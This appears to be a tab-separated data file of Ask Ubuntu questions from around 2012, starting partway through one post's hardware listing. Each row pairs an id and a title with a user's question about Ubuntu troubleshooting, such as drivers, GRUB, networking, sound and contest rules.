00:00.0 host bridge : intel corporation mobile pm965/gm965/gl960 memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 03 ) 00:02.1 display controller : intel corporation mobile gm965/gl960 integrated graphics controller ( secondary ) ( rev 03 ) 00:1a.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 1 ( rev 03 ) 00:1c.3 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 4 ( rev 03 ) 00:1c.4 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 5 ( rev 03 ) 00:1c.5 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 6 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev f3 ) 00:1f.0 isa bridge : intel corporation 82801hm ( ich8m ) lpc interface controller ( rev 03 ) 00:1f.1 ide interface : intel corporation 82801hm/hem ( ich8m/ich8m-e ) ide controller ( rev 03 ) 00:1f.2 sata controller : intel corporation 82801hm/hem ( ich8m/ich8m-e ) sata controller [ ahci mode ] ( rev 03 ) 00:1f.3 smbus : intel corporation 82801h ( ich8 family ) smbus controller ( rev 03 ) 07:00.0 ethernet controller : marvell technology group ltd. 88e8072 pci-e gigabit ethernet controller ( rev 16 ) 0a:01.0 firewire ( ieee 1394 ) : o2 micro , inc. firewire ( ieee 1394 ) ( rev 02 ) 0a:01.2 sd host controller : o2 micro , inc . integrated mmc/sd controller ( rev 02 ) 0a:01.3 mass storage controller : o2 micro , inc . integrated ms/xd controller ( rev 01 ) same cards , same machine ( same reader ) only different os ( win7 ) work flawlessly . some interesting reading i came across but is chinese for me http : //www.mail-archive.com/linux-mmc @ vger.kernel.org/msg14598.html and another bit http : //article.gmane.org/gmane.linux.kernel.mmc/11973/match=sd+card+not+recognized
151214	how to install intrusion detection system in ubuntu 12.04	basically i m looking for some intrusion detection system ... . so i find snort is one of them , soi i need step by step configuration to install snort & some snort web-based monitoring tool ..like `` snort report `` is there any good alternative for intrusion detection system ? if yes how to install them
151216	how can i force the rediscovery of pulseaudio virtual sound devices ?	i 'm using the pulseaudio feature of network sound devices ( not multicast/rtp ) to play sound from my netbook on the audio equipment connected to the htpc when at home . this creates a virtual sound device that i can then use instead of the physical built-in one . most of the time this works just fine . sometimes however , the virtual sound device just does n't appear . disconnecting from and reconnecting to the network helps sometimes but not always and it 's annoying and potentially bad for existing tcp connections . so my question basically is : is there some way to tell pulseaudio `` hey , just look again if you really ca n't find a network sound device. '' ? edit : unloading and reloading the module-zeroconf-discover with pacmd does not help either and it does n't appear to be an avahi problem per se since avahi-browse -t -- all | grep pulseaudio shows lots of right-looking stuff , even when the devices are n't listed in pavucontrol or pacmd list-sinks . edit 2 : i 'm using ubuntu 12.04 on both boxes for all the difference it might make .
151224	how to get xchat to automatically `` ghost '' the old `` session '' on provider-forced reconnect ?	my provider forces a re-connect all 24h , which breaks my xchat session . though the connection usually is re-established within seconds , due to the changed ip the `` old session '' is invalidated . xchat automatically joins the network ( s ) , but then my nick gets refused as it `` is already in use '' . i can manually solve that by `` /nickserv ghost myuser mypass '' -- but i could not find any place to configure xchat to do that automatically . is that possible , and if so , how ?
151232	all files gone after running fsck . how can i recover my files ?	i installed ubuntu server 10.04 lts . it worked great for many months , until today i decided to run fsck on the system partition and although it warned me , i kept pressing yes and now it will only boot into grub prompt . i read some article that recommended trying grub reinstall . but before performing grub reinstall , i decided to run fsck again from ubuntu 10.04 lts for desktop live cd . the fsck painfully passes , now my drive is recognized as ext4 system and i am able to mount it again . however , all i can see is just boot directory and lost & found . i tried to perform grub reinstalling by doing grub-install stuff , now my grub is still not loading right , my files are missing , and the weird thing is that the amount i found used by boot and lost n found is only 5gb and the amount used in he hdd is 8 gb . so my files must be somewhere in the hdd . is there any simple way maybe a gui tool or something that can recover my files ? i only need to retrieve my database backup and everything else can go .
151235	missing panel icons at top right in gnome3	i 've got the problem with missing top right icons after the recent update of the system . i 've found in one of the posts on ubuntugenius website the following sets of commands , but they did not help : gconftool-2 -- shutdown gconftool -- recursive-unset /apps/panel ( this wipes the panelâs settings . ) rm -rf ~/.gconf/apps/panel ( this deletes the panelâs folders and files . ) killall gnome-panel ( this forces the panel to close and restart . ) any other ideas how to bring them back ? i really need the battery status as i often work unplugged .
151240	how to programatically fetch the download status of google chrome ?	how would i go about determining if google chrome is downloading something , and getting the `` percent-done '' value of that download , from the terminal using a python , perl , or bash script ?
151243	ubuntu not installing newest version of apps ?	hi i just installed blender and gimp only to find that it is installing older versions not the newest versions . it installed gimp 2.6 rather than gimp 2.8 and blender 2.62 rather than 2.63a how do i update them , i 'm finding that its extremely hard to use the command line to install anything and there are no .deb files on their websites . ubuntu should really fix this as new users like myself just expect to get the newest versions , even when i updated with the update manager it still wo n't install the newest versions . i had to use command line which is very hard . there is nothing wrong with making ubuntu easier ! .
151244	why ca n't i copy text from the ubuntu terminal ?	this is really weird . i ca n't copy anything from the terminal . the ctrl+shift+c command and edit- > copy does nothing , no matter how much or little text i have selected . what ever was on my clipboard before the command is still there after . why ca n't i copy text from the terminal ? pasting into the terminal works just fine
151248	ca n't detect gpu ati temperature sensor	i 've an ati mobility hd4650 and i 'd like to detect its sensor . i 've installed lm-sensors , xsensors and the hardware sensors indicator , but i ca n't find my gpu sensor . here are some screenshots : also , if i use the aticonfig -- od-gettemperature command , i get this error : error - get temperature failed for the default adapter - ati mobility radeon hd 4650 i 'm using ubuntu 12.04 x64 .
151252	alt+left click , how to remove shortcut	i have ubuntu and gnome 3 and when i do alt+left-click it grabs the current window . how do i stop this from happening , as i need this shortcut in blender which i update often so changing it inside blender is not logical .
151253	removing grub from windows system after uninstalling ubuntu from windows 7	i have installed ubuntu alongside windows 7 ( no separate partitions , i selected inside windows option ) . i want to uninstall ubuntu but last time i tried it and the ubuntu is released but the grub remains . how do i remove grub ?
151260	how do i translate a quickly project ?	i am just getting started with using quickly and i have a small project that 's starting to take shape . right now i would like to add a translation to my project . i already noticed that quickly automatically generates po/.pot but i ca n't quite figure out how/where to add the language-specific .po files . i tried creating en.po / de.po / es.po manually inside the po/ sub-directory but - even after i run quickly share - quickly ( using quickly run or the installed .deb ) does n't seem to recognize / use the translations . am i missing something really obvious/stupid ? any help would be highly appreciated ! cheers , marcel
151261	when changing the workspace switch shortcut to super+arrow the window does not disappear	i ca n't use ctrl+alt+up on my computer because of the hardware . so i changed the shortcut for switching workspaces to super+arrow . but now the little overview window that shows up to show wich workspace i switched to does not dissapear . any idea ? edit : at the moment i can just close it with esc .
151267	after a compiz traditional crash my top toolbar disappeared . what can i do now ?	at this moment my compiz crashed , and the top bar disappeared , as also alt + tab , or the left launcher . so i cant open a terminal ( with ctrl+t ) , or change program that i am using . im locked into firefox and cant open , reboot or logoff ( only on the power button ) . what can i do ? ps : after i upgraded from 11 to 12.04 my ubuntu is always crashing , lagging more , etc .
151268	where to ask questions related to ubuntu app developer showdown ?	i recently saw ubuntu app developer showdown and i am very excited about it . i have some questions about it and i seriously want good answers can you tell me an official or unofficial communities forums or emails where i can get good anwsers thanks . can i use old code by myself to build on for my entry in the ubuntu app showdown contest ? how do i participate in the ubuntu app showdown ? already seen these questions
151280	upgrading a live 8.04 lts server to more uptodate version	running apache , mysql , php with moodle 1.9.9 running as a school based cms . all possible updates for 8.04 have been applied . moodle 2.x from versions 2.1 onwards needs php version 5.3.2 which is included in more recent distribution version . would i be better ( safer ) upgrading php & mysql or upgrading ubuntu to a more recent version ? - if upgrading ubuntu is better , are there any caveats i should know before attempting this . i will be taking a copy of the entire server before doing any upgrading . hoping to run on a test version also . bit green on linux hence lack of confidence .
151282	getting list of installed apps ( not packages )	how can i get list of installed apps ( based at files in /usr/share/applications/ ) without writing own parser ? i need just app name , path to app icon and path to launch app . i 'm using c++ with qt libraries . of course , you can write me shell command or something else like it .
151283	why do n't the ubuntu repositories have the latest versions of software ?	why are packages in the official ubuntu repositories older than the latest ( upstream ) versions from debian sid , ppas , the authors , etc . ?
151288	some questions related to ubuntu app showdown	i have some questions about ubuntu appshowdown my questions : can i submit more than one app in the contest and tell me more about this suppose i submit 5 apps out of which one is won then will it be valid if 2 or 3 are won i think the number of t-shirts does not depends upon number of apps one per person for development i have to use quickly but can i use third party libraries for gui or other work i think i will need it for eg . pyside the first and second winner will get laptop + mobile too right or not the mobile how the prizes will be delivered will they charge ( i do n't think so ) i would like to use multiple libraries i can use htme right ? more details are always welcomes i have read mostly all ubuntu app showdown related pages but if you find something in background than tell me note : i am not saying that i am going to win just questions do n't take it in that way
151291	how to create a remote desktop server on ubuntu server per user	i want to create an old style server - thinclient/terminal kind of work with ubuntu server 12.04 . i was trying to use x11vnc to serve remote desktops to users but from what i have understood [ after couple of hours ] it directly serves the x display of/to only one user . i want to have something like windows 2008 rds-login where every user connects and logins to his own desktop and has his own working environment . is it possible with ubuntu server ? thank you edit : it seems that xrdp is able to serve such service . i will check it out . edit2 : xrdp does really create the environment i want and works fast and good . i only had a small problem with default xsessions for each login . the solution was to create a .xsession file in ~ of user and add gnome-session -- session=gnome now i am trying to change session language for xrdp . altough user accounts changed their language settings , xrdp session always comes up with default english . edit3 : i changed /etc/default/locale to my desired language changing whole operating system to my native language still looking for a way to configure it for per user
151294	network is only available in recovery mode	i am using ubuntu 12.04 , unity . if i boot regularly , there is no internet access . there is no network icon in the unity panel nor does the `` network connections '' program show anything . however , if i boot into recovery mode and select `` enable networking , '' everything works as usual . as far as i know , i have not messed with my network configurations for several months prior to this problem .
151297	why are bugs responsible for big deficiencies in functionality given such low priority ?	well , first of all , change is inevitable and mostly good . furthermore attempts at simplifying the user interface such as gnome 3 , unity to make linux more inclusive hold much promise , even though they adversely affect my style of working . additionally , though now retired , i have worked with computers for 47 years , and though i do nothing serious for others now , i still do heavy duty things . 10.04 lts is my big workstation , and i had three 10.10 systems for mythtv , and one of which is further adapted for video & related . the mythtv were 10.10 because of a dormant bug regarding installing to 10.04 . my work habits consistently use dual monitors , compiz cube and 3d windows with the computing horsepower to support them . the dual monitors with separate x screens has been not been functional since 11.04 , and cube/3d windows not functional in unity , and with diminished functionality gnome . there is a bug filed ( after upgrade to 12.04 amd64 gnome classic not properly draw second screen ) i have mitigated the situation some by switching to xubuntu and eschewing unity . the question that comes to mind is why this bug is not given more attention in that it nearly cuts functionality in half for more competent workstations . sample xubuntu 12.04 workspace ... please know that i appreciate all the hard work and dedication required to pull off something as big as ubuntu , et al .
151298	how can i replace photoshop ?	i am in need of some good software that helps me replace photoshop . in particular , i do several tasks involving .psd files , and i can find no way to make the gimp do the job . any ideas ? best regards .
151301	launchpad fails to build a package for my ppa	i 'm trying to build a package on launchpad 's debian build system for ppas but i 'm having some issues with a certain package . the package i 'm trying to build ( zorin-xwinwrap ) contains a source c file which i 'm trying to get to compile and build on launchpad 's server so that it would install and work on 32 bit ( i386 ) and 64 bit ( amd64 ) systems . unfortunately i keep on getting an error code 2 with the debian/rules file and i have no clue how to fix this issue . the following link is the source package of the software i 'm trying to add to my ppa : http : //ubuntuone.com/4i8xctqen2adpb20oulgri the following link is the buildlog for the failed package on launchpad : https : //launchpadlibrarian.net/107687586/buildlog_ubuntu-precise-i386.zorin-xwinwrap_1.0.2_failedtobuild.txt.gz
151302	bios memory settings and virtualization + ubuntu ( unofficial answers welcome )	attempting to optimize my ( main windowless ) ubuntu system for my uses i will detail questions below , i understand this might be the wrong place to ask these questions . if so , my apologies and i thank you so much for your patience . thanks to all the volenteers that have helped me learn ubuntu over the years ( since 5.10 ) this is a `` short '' list of questions i have been trying to figure out for some time . if you feel you can answer one but not another , that 's already more than i could ask for . i have wrote this up in a format for easy navigation to important points hopefully to less annoy your eyes . you 're welcome : ) or i 'm sorry i annoy you . : ( if you would be so kind , please format answers as follows : question 1 : _ _ _ _ _ or question 1-a : _ _ _ _ _ if you want to simply link me to relevant information , rather than type up something really detailed ; that would be more than awesome ! memory specific questions goal : maximizing memory bandwith to better perform in virtualization , and large file compression . ( possible conflict ? ) ganged vs unganged `` which is better ? `` ** is relative , i know . but what about ganged vs unganged - > with or without bank/channel interleaving ? a : speculation - > if i understand correctly , `` channel interleaving has something to do with using both channels to read or write in a kind of `` striping '' pattern , as opposed to a standard half duplex operation . ( probably wrong ) but would n't ganged channels make this irrelevant ? memory interleaving ( bank ) . does it have a down side ? does it require a ratio of clocks ? ( if i run 4x4gig ddr3 ) a . if im reading correctly ( trying to learn ) , this is designed to spread operations between latency cycles to work around the higher latency of `` normal '' operation . b . however it seems to me that it has to be : divisible by fractions of a master clock ? so if i run memory at 1333mhz , then the mean between 2 ( physical ) banks would operate every ( roughly ) 600mhz ? warning ! possibly utter nonsense : ( 1333/2 interleaving to act like 1 memory module per 2 sticks of a total of 4 sticks , meaning 2x channels @ 4 ) c. which makes me wonder if there would be left over clock cycles the system would have to ... `` truncate/balance '' or something ? but i 'm certain theres a feature somewhere i do n't understand . virtualization questions amd-v - > option of iommu turned it on , why do i have extra option of `` 64mb '' ? if iommu is on , but `` 64mb '' is `` disabled '' , is it on ? ( have scoured google , i still dont know ) a. i think i understand that its supposed to ( kind of ) `` set aside '' a part of ram to act as a faster interactive zone for `` stuff '' ( usb , graphics , and ... what ? ) b. i am using nvidia graphics on amd ( used kernel option `` iommu=pt iommu=1 , pt `` passthrough '' ? no idea what they do , found it on google to solve boot up issue ) c. will this option help me use low latency sound hardware , like my midi keyboard ? can you recommend any additional tweaks ? a. sysctl settings ? b. swap settings ? grats , youve reached the end . thanks for reading .
151306	volume hot keys not working in xfce	just installed vanilla xubuntu 12.04 lts & updated on a thinkpad e325 with conexant cx20671 sound card . i notice volume hotkeys work under xubuntu de but not under xfce . sound settings are completely missing under xfce . bubble bar invoked by +/- hotkeys , is greyed out ; though volume slider that resides in system tray still functions . muting/decreasing/increasing volume with hot keys has no effect . is there a workaround ? if not what package would i report a bug against ? ps : i 'm running 64-bit . pps : it just goes through the motions under xfce de , gui volume will rise & fall , but actual audio will not change . ( this is due to hotkeys being mapped wrong ; see below . )
151312	how to change ubuntu from 64 to 32 bit	my brother installed 64 bit ubuntu on my moms old pc ( dualboot with winxp ) and it runs very crappily . it is on ubuntu 11.10 and i was wondering if there is any easy way of updating to 32 bit 12.04 . i know on fedora when you insert instillation media on a computer that already has fedora it asks you if you want to install it over that fedora , is there anything like this for ubuntu . thanks !
151319	how do i set up grub to display on 2 monitors ?	how do i set up grub to display on 2 monitors ? i have a laptop plugged in to a external monitor . most of the time , i leave the laptop closed , and just use the monitor , but when i boot up , i have to open the lid to select grub boot option . i do n't want to set the config to be only the external monitor in case i am not plugged in to one . so i figure a mirrored config would be best . i have an nvidia m360 card if info is required .
151320	computer is randomly shutting down . what could be ?	i 'm having some problems , my computer is shutting down at random intervals , but from today it started to shut off rigth after the login screen . it 's a toshiba laptop . i thought it was the cpu overheating , but it 's not . i tried also different rams and it wo n't work either . then i was thinking that it could be related to the acpi but i tried adding the `` acpi=off '' in the boot/kernel and it shut off again . so i really have no idea about what 's happening . i still can boot in recovery mode but with the cli only , as soon as i issue `` startx '' it 'll shut down , sometimes instantly and other times after 1 o 2 minutes . other thing i tried was booting live from an usb drive . it also shut down , after the gui showed and the drive lost its booting capabilities . do you have any ideas ?
151322	how to replace a pae kernel with non pae kernel ?	after reading the information from my question pros/cons of pae , i want to remove pae kernel because i do n't need them . i know removing a kernel from synaptic package manager . thats easy job but how to get non-pae kernel of current ?
151324	how do i install intel ethernet drivers ?	i just bought a lenovo t420 , i booted the live cd and could n't connect to my wireless router so i figured i needed the drivers for it . i have the last version of ubuntu ( 12.04 ) . it 's a intel速 82579 gigabit ethernet controller so i went on intel 's website and downloaded the drivers for linux and compiled them with make install . here 's the tutorial i followed : linux driver install i have a few question though , what are these doing : modprobe e1000e ifconfig eth0 up dhclient eth0 ping intel.com as far as what i 've read , modprobe seems to add the driver to the list of drivers for the kernel , but is that operation only good for one session ? the two other lines , i do n't understand either what they are doing . what does he mean at the end when he mentions : note : whenever the kernel version is upgraded you will need rebuild this driver . and are these steps permanent ? or do i have to add them to some boot.conf file for everytime i boot . anyways , the steps worked for me and i have established a connection with my router , i just need to know if i need to do additional steps to keep the driver permanently etc .
151325	how do i fix `` sorry , a problem occurred while installing software blcr-dkms '' ?	i have ubuntu 12.04 running smoothly without any problems . until recently , i have been receiving this pop-up stating sorry , a problem occurred while installing software package : blcr-dkms ubuntu keeps running fine . i do n't know if there is really anything wrong . in the case that everything is fine , how do i remove these messages ?
151328	how do i prevent totem and other programs from logging all recently played files ?	this is a frustrating problem , is there any way to prevent totem from logging all of the files i watch ? the same goes with picture viewer . under dash - > privacy , i 've turned off logging and disabled it specifically for those problems yet every new file i watch appears in the totem menu . it leads me to believe that if totem is recording it , then other programs are recording it as well . are there any workarounds ? i 've already added `` gtk-recent-files-max-age = 0 '' to my gtkrc-2.0 file and the problem persists . any ideas ?
151330	nvidia gt540m wont work under ubuntu 12.04 , even tried different thinks	first of all , i want to apologyse in advance for my bad english , i hope you can understpood what i want to say . also iam new to ubuntu , so please dont be agry with me . i got a problem with my notebook with ubuntu 12.04 my system got an optimus chip with i5-2430m and an nvidia gt540m i would be happy if i could use the nvidia optimus dosent have to be the optiomus solution . i tried serval thinks and readed serval tutorials , so i tryed my luck over here . perhaps u can help me . situation : the system wont recognize my gpu just say `` unkown '' what i treid : serval thinks xd f.e . 1 : i downloaded the driver from nvidia website , turned of ligthdm installed it at tty1 turned ligthdm on added xswap and bumblebee to my rep ( as u can see here : wiki.ubuntu.com/bumblebee # installation ) unpdated it installed it 3.tried to change the xorg.conf file nothink helped me . perhaps some could help me with that please lspci : http : //paste.ubuntu.com/1042355/ var/log/ http : //paste.ubuntu.com/1042349/xorg.0.log ps : i also tried ironhide like here asked but cant post the url ( cause iam new )
151334	how do i make gdm the default display manager ?	i believe my question says what i am trying to achieve . steps i tried to make gdm my default display manager : sudo dpkg-reconfigure than select gdm as my default . edit /etc/x11/default-display-manager and change its content to /usr/sbin/gdm after the above two steps i logged out myself and after that when i see my login screen it still shows lightdm as my display manager . what am i doing wrong here . ?
151336	how do i change the size of dialogue boxes ?	i also having another problem associated with the dialogue boxes specially which asks for password . they are wider than normal as i seen in ubuntu 11.10 . is there a way to control the size of those boxes ? those looks very ugly , more like a prompt dialogue of firefox web browser .
151337	screen saver issue	when i leave my pc alone for while the screens turns black , which is fine . when i return and move my mouse it comes back on but my second screen stays black and my first screen has a blue overlay over the top of the unlock screen . i believe this is to do with my dual screens on gts450 . screen 1 is 1920*1080 screen 2 is 1024*768 the blue overlay is on screen one and looks to be the size of screen 2 i can put the password in and press enter and then everything goes back to normal , but how do i fix this issue of a blue overlay stopping me seeing whats on screen ?
151356	pressing `` print screen '' making the screen flash two times . how can i stop that ?	pressing “print screen” key takes a screenshot and gives the feel of as i 'm clicking a photo . it was the normal behavior on ubuntu 11.10 . but on 12.04 when im pressing “print screen” flash happens two times , which is very wierd .
151357	amnesia : the dark descent not installing	i 've tried 3 times now to install amnesia from usc , but every time i do , it gives an error and the code below . installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 186914 files and directories currently installed . ) unpacking amnesia ( from ... /amnesia_1.2.1-0ubuntu2_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/amnesia_1.2.1-0ubuntu2_amd64.deb ( -- unpack ) : failed in write on buffer copy for backend dpkg-deb during `./opt/amnesia/maps/main/ch01/05_wine_cellar.map ' : no space left on device no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/amnesia_1.2.1-0ubuntu2_amd64.deb error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) has anyone else experienced this ? can i fix it ?
151360	grub configuration not responding	recently , i tried to reconfigure grub to boot kernel 3.2 instead of 3.4 , but by booting , grub is not responding to any changes i make in the grub.cfg file . editing /etc/default/grub and updating it with update-grub does n't bring any errors and changes and ends with done.. kernel 3.4 is always booting , whatever i do . google is speechless .
151366	how to configure micromax 352g usb modem ?	i want the driver software for my micromax 352g usb modem for ubuntu 12.04 lts . on ubuntu 10.04 sakis3g was working well , but it is not working on ubuntu 12.04 lts .
151367	when will skype 4.0 enter ubuntu 's repositories ?	according to this link , skype 4.0 is released . so when will it enter ubuntu 's repo , and will pidgin-skype still be able to call back skype for to chat ? thanks for any further explanations !
151368	how can i reset auto-run settings for removable devices ?	i have an android phone i 'm working on , and i accidentally clicked `` do nothing '' when the little window asking me what to do when it plugged in popped up . now , adb devices shows that the device is n't even recognized . how can i change the default behavior ? i went to applications - > system tools - > system preferences - > removable media and set everything to `` ask me what to do , '' but it seems that the settings are stored specifically for this device . any tips on finding where the settings are stored ?
151369	how to create start-up disk for 12.04 without ubuntu software center ( broken ) using dell inspiron mini	i messed with some ( okay , many ) codes in terminal trying to work on another issue . ( copying and pasting from other posts here . ) now ubuntu software center is not working at all . it closes and tells me ubuntu 12.04 has an internal error but can not determine what it is . i used this link to uninstall and reinstall ubuntu software center . it did not change anything . what i want more than anything in the world right now is to completely wipe out my current 12.04 and reinstall it fresh . i have made back ups of my files . i have the 12.04 desktop iso on my flashdrive , i know that it is my # 2 key on my computer to kick it into the boot device ( i use a dell inspiron mini which has no f12 ) . but it is not working . i think someplace i read about needing to create a start up disk but i am having a hard time finding a explanation simple enough for a 3 year old to follow that will help me do this without the software center which will not even open up . please help . i just want my computer back and am so incredibly frustrated .
151371	how to install ubuntu on a mac and keep osx ?	could anyone provide a concise step by step instruction on how to install ubuntu 12.04 on a mac os x lion ? i have read that ubuntu corrupts the efi file so i would like to hear from those who have successfully done it .
151373	how do i enable bluetooth on a compaq presario cq57 ?	i have a compaq presario cq57-435eq laptop , and i do n't know how to enable bluetooth . can anyone help me ? i have ubuntu 12.04 lts , and i used it for weeks , still using it .
151374	what directory are applications installed into ?	just a quick question as i 'm a newbie in linux , im just curious that when you install any application through terminal or software center then in which folder the application is installed as we know that in window it is installed in programs folder but what about ubuntu or any other distro ?
151375	righ click does n't work on an elantech touchpad	neither two nor three finger click . everything else works perfectly ( two finger scroll , dragging etc. ) . the core is 3.2.0.25 .
151377	where is the configuration file so i can remove applications from startup ?	there are certain applications which start themselves at start-up and i want to remove these applications from start-up . i know i can remove them using the gui way from system settings but i was wondering is there any file i can edit to remove these start-up applications . i looked into /etc/xdg/autostart and found my applications with .desktop extension but i have no idea which file to edit to remove these from start-up . in short i am looking for a terminal based based solution and not a gui based .
151379	ubuntu one lost most of my files !	i keep the source code of my projects in my ubuntu one as a back up . in the past it worked and i never had any problems . i had to change the hard disk of my laptop so i installed a fresh ubuntu 12.10 on the new drive . ubuntu one downloaded my files the first time i connected . but when i checked on my projects , almost all of my c++ source code files were missing ! ! ! i tried to check if i still had them on ubuntu one by accessing from the web but nothing ... my work is lost forever . i do n't know who to ask for help ? is there a way to get back my precious files ? honestly i ca n't trust this service any more , i 'm very disappointed . edit : thank god i found a back up in one of my external hard disks . i wo n't trust ubuntu one any more , it 's buggy and quite slow .
151383	server error ( -5 - no address associated with hostname )	this seems to be a common problem with 12.04 . i 've done the searches and found various and sundry replies , but i 've yet to find a solution to my situation . i 've installed 12.04 32bit on a server box i have in my office , and am using it to get used to joomla cms , but i can not seem to do updates , upgrades with it , nor can i use aptitude to get new software . the machine will not authenticate against the repos is what i 'm thinking . it works fine as long as i have dhcp set up , but when i go to a static ip situation it falls flat . i have networking working perfectly other than this . as far as i can tell , it 's in the nameservers from my isp not propogating into resolv.conf . here is my /etc/network/interfaces file contents : : ~ $ cat /etc/network/interfaces # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface \ these stanzas are kept in order # auto eth0 \ for me to easily switch between dhcp # iface eth0 inet dhcp / and static addresses so i can update # / the system from time to time auto eth0 iface eth0 inet static address 192.168.1.130 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 gateway 192.168.1.1 dns-namservers 75.75.75.75 75.75.76.76 192.168.1.1 dns-search hsd1.wa.comcast.net # nameserver 75.75.75.75 \ this data is taken # nameserver 75.75.76.76 \ from resolve.conf # nameserver 192.168.1.1 / while networking with # search hsd1.wa.comcast.net / dhcp instead of static ip for the life of me i can not figure out why this is not working . i 'm totally missing something fundamental here i think . the search stanza is working , and shows up properly inside resolv.conf : search hsd1.wa.comcast.net i 'd really appreciate anyone 's help on this .
151387	confirming pgp key on launchpad	i created an account in launchpad and wanted to upload my pgp key in my account . i followed the instructions in ubuntu getting set-up guide and launchpad guide . accordingly i received a mail in my gmail account ( i had used gmail for registering in launchpad ) , and i copied the pgp contents and pasted in the terminal in gpg command . this is the output i got , user : `` abc < def @ gmail.com > '' 4096-bit rsa key , id abcd1234 , created 2012-06-15 ( main key id efgh5678 ) gpg : encrypted with 4096-bit rsa key , id abcd1234 , created 2012-06-15 `` abc < def @ gmail.com > '' the gpg program is not exiting after this . after this , the guide just asks us to go and confirm the pgp key in the launchpad page . but i do n't see any such link there . am i doing something wrong here ? how does running gpg on my computer inform launchpad if the key is valid or not ?
151389	some videos have no thumbnail ?	i just downloaded a video series and opened the videos folder to find that some of the videos have thumbnails and some do not . how can i force the others to generate thumbnails ? i have tried playing the videos with out thumbnails but they did not generate ; i also tried renaming them , but no luck . all videos are mp4 and play fine . i did tell ubuntu when installing to install 3rd party codecs etc .
151390	can i participate in showdown contest with friend ?	can i write an application , together with my friend ? if i develop application with my friend , can i get t-shirt for me and my friend ?
151391	wrong notification on gnome shell ?	i just installed gnome shell on my 12.04 a couple hours ago . the notifications are just cool , and i installed shell extensions , and it works smoothly in 1 hour . then i restarted my computer for some reason , start back in to gnome . and i was surprised with the default notification showed up . it replaced the gnome notifications ! i tried to : reinstall gnome-shell . ( autoremove and install ) reset desktop configuration . but it did n't work at all . is there anything i can do to fix it ? plus : i got a double notification ( osd + gnome notification showed up ) when someone chatted me .
151393	facing problem with `` gtk.response_ok '' in the simple-player quickly tutorial	i am fairly new to both quickly and python . i am facing several problems while learning to use quickly from the following tutorial on the ubuntu developers site : http : //developer.ubuntu.com/resources/app-developer-cookbook/multimedia/creating-a-simple-media-player/ the following error i 'm unable to understand : traceback ( most recent call last ) : file `` /home/sumit/sumit/simple-player/simple_player/simpleplayerwindow.py '' , line 36 , in on_openbutton_clicked if response==gtk.response_ok : nameerror : global name 'gtk ' is not defined i realize that i am supposed to import something , so i tried to add import gtk which it did n't work and it gave the following error : from gtk import _gtk /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : g_type_get_qdata : assertion `node ! = null ' failed from gtk import _gtk i have followed every step of the tutorials so far . but there is no mention of any other imports other that `` prompts '' and `` os '' . please help . contribution of agmenor , facing the same problem : i also tried to replace the text if response == gtk.response_ok : by if response == gtk.response_ok : ( notice the capital g ) . this gives another error : attributeerror : 'gi.repository.gtk ' object has no attribute 'response_ok'
151394	is a non-trivial plug-in for some application considered an app ?	in the context of the ubuntu app showdown , if a useful plug-in for an existing application ( in my case blender , but it could be anything ) were to be developed , could it be considered ?
151396	can you change the look of 12.04 to that of 11.10 ?	can you change the way ubuntu 12.04 looks so that the menu systems look like those from 11.10 ?
151403	xubuntu - how to restore `` default '' terminal text coloring	terminalemulator is preset to match xubuntu theme , but it is rather low contrast and i would like to use other theme . the standard ones , like tango and linux colors are enough , any ideas ?
151407	installed 12.04 from cd problems with compiz-core - wont continue - just	installed 12.04 from cd to clean hard drive but on first boot up says problems with compiz-core . clicked continue with it not installed . after i sent info for help ; it came back with some packages are not up to date . said i need to update compiz-core and libylib2.0-0 cancelled the process to send info ( after second time ) but it wont cancel and it wont load the desktop . what do i do now ? right click will let me create a new folder/document or organise desktop by name etc but i can not see the usual system bar or left menu items . is there a way to load the terminal and reload the desktop . if this was windows i 'd use cntrl alt delete and run explorer to fix the desktop .
151409	is installing ubuntu 10.10 still a viable option ?	i fell in love with ubuntu when 10.10 was released . i want to stick to it , since i like it a lot more than the 11 and 12 series . my question is , since its not currently supported , what problems will i face ? will i be eligible for update ? i mean atleast till the time it was supported can i somehow get security updates and patches will the latest software available still run on ubuntu 10.10 i do n't care much about drivers , as much as i care about python , php , apache , wine and other softwares . will the software center work , and will there be updates ? what issues am i most prone to face ?
151411	how to send files to my computer via bluetooth ?	i can pair my htc one x with ubuntu , but i ca n't send any files to my computer from my phone . every time i try my phone reports the transfer failed and i never get prompted by the computer to accept the file .
